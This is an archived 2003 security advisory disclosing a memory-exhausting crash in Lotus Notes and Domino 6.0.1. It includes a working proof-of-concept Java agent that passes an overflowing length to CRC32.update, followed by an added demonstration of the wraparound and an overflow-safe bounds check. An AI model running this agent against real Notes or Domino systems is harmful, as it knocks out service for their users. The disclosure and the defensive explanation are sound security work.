Java Agent freezes Lotus Notes and Domino 6.0.1

From: Marc Schoenefeld (schonef@uni-muenster.de)
Date: Sat Apr 05 2003 - 13:48:50 PST

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    Hi,
    
    the following agent causes the IBM JVM 1.3.1 shipped with Lotus Domino 6.0.1
    and Lotus Notes 6.0.1 to crash. After calling the agent a huge amount of memory
    is not freed and causes the server machine (observed on MS XP) to
    deny further service.
    
    IMPLICATIONS
    - - If the agent is run on the client, Lotus Notes 6.0.1 is vulnerable,
    - - if the agent is run on the server, Lotus Domino 6.0.1 is vulnerable.
    
    ANALYSIS:
    The call to the "update" method of the CRC32 class raises an integer overflow
    in the Java java.util.zip.* core libraries, which triggers a JNI routine
    that cannot handle the extremely high input value.
    
    HISTORY:
    This vulnerability has already been detected in the Sun JDK
    (http://developer.java.sun.com/developer/bugParade/bugs/4811913.html),
    and was disclosed at Blackhat Windows 2003.
    The background of this bug is described at www.illegalaccess.org
    
    Sincerely
    Marc Schoenefeld
    
    =========================Agent Source Code===========================
    import lotus.domino.*;
    import java.util.zip.*;
    
    public class JavaAgent extends AgentBase {
    
    	public void NotesMain() {
    
    		try {
    			Session session = getSession();
    			AgentContext agentContext = session.getAgentContext();
    			CRC32 crc32 = new CRC32();
    			// Offset 4 plus length 0x7ffffffc exceeds the int range
    			crc32.update(new byte[0], 4, 0x7ffffffc);
    
    			// (Your code goes here)
    
    		} catch(Exception e) {
    			e.printStackTrace();
    		}
    	}
    }
    =========================Agent Source Code===========================
    
    
    - --
    
    Never be afraid to try something new. Remember, amateurs built the
    ark; professionals built the Titanic. -- Anonymous
    
    Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.6 (AIX)
    Comment: For info see http://www.gnupg.org
    
    iD8DBQE+j09FqCaQvrKNUNQRAs9uAJ4unAFEKqqRuk4gBlkNSKQ5rTMa0wCfVzC+
    iJHcqblX8QE7UaPofUrKU3Y=
    =l93r
    -----END PGP SIGNATURE-----
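
Added example, not part of the original post and not IBM's or Sun's library code: it shows how a range check written as `off + len > b.length` wraps for the arguments used in the agent above, next to an overflow-safe form of the same check. The two check shapes and the class and method names are assumptions for illustration; only the argument values come from the post.

```java
public class CrcBoundsCheck {

    // Assumed shape of a flawed range check: off + len is evaluated in
    // 32-bit int arithmetic, so a large len makes the sum wrap negative
    // and the comparison against b.length no longer rejects the call.
    static boolean naiveCheckAccepts(byte[] b, int off, int len) {
        return !(off < 0 || len < 0 || off + len > b.length);
    }

    // Overflow-safe form: once len >= 0 is established, b.length - len
    // stays inside the int range, so the comparison cannot wrap.
    static boolean safeCheckAccepts(byte[] b, int off, int len) {
        return !(off < 0 || len < 0 || off > b.length - len);
    }

    static void report(String label, byte[] b, int off, int len) {
        System.out.println(label);
        System.out.println("  off + len as int  : " + (off + len));
        System.out.println("  off + len as long : " + ((long) off + len));
        System.out.println("  naive check accepts: " + naiveCheckAccepts(b, off, len));
        System.out.println("  safe check accepts : " + safeCheckAccepts(b, off, len));
    }

    public static void main(String[] args) {
        // Argument values taken from the agent in the post.
        report("Arguments from the post", new byte[0], 4, 0x7ffffffc);

        // Constructed control cases: a valid range must pass both checks,
        // and an ordinary out-of-range request must fail both.
        report("Valid range (constructed)", new byte[16], 4, 12);
        report("Plain out-of-range (constructed)", new byte[16], 4, 13);
    }
}
```

When validated native code sits behind a Java wrapper, the range check in the wrapper is the only barrier, so it has to be written so that no intermediate value can wrap.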
    


